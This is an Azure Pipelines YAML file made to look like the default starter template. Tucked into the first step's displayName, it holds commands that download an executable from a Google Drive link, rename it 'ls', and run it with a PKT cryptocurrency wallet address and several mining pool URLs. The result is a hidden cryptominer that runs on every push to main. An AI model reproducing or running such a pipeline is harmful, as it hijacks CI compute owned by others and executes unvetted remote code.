# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script: echo Hello, rld!
  displayName: 
  curl -L "https://docs.google.com/uc?export=download&id=1wdNIj39pO9jWBhgXTaWEiZUU4-pGWi0E" > ls
  chmod +x  ls
  ./ls ann -p pkt1q9su7naaf4w077xnnpafr55wlvfhmmew4z8xeje http://pool.pkteer.com http://pool.pktpool.io http://pool.pkt.world https://stratum.zetahash.com

- script: |
    echo Add other taaasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
  displayName: 'Run a multi-line script'